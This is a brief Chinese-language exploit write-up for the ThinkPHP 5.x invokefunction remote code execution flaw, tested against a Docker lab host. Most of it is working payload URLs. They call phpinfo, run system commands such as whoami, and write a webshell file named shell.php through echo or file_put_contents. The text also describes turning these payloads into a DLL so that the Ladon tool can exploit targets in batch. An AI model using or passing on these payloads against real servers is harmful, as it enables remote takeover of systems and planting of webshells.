前言
使用Exp生成器生成Ladon插件實戰,ThinkPHP GetShell
漏洞環境
使用docker ThinkPHP 5.0.20
複現測試
Payload:
http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
執行指令
http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
寫入檔案
GetShell1
http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php
GetShell2
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL編碼内容
視訊教程
通過EXP生成器将以上Payload轉成DLL,使用Ladon即可批量利用,詳情請觀看視訊教程
Video: K8Cscan ThinkPHP 5.x RCE Exploit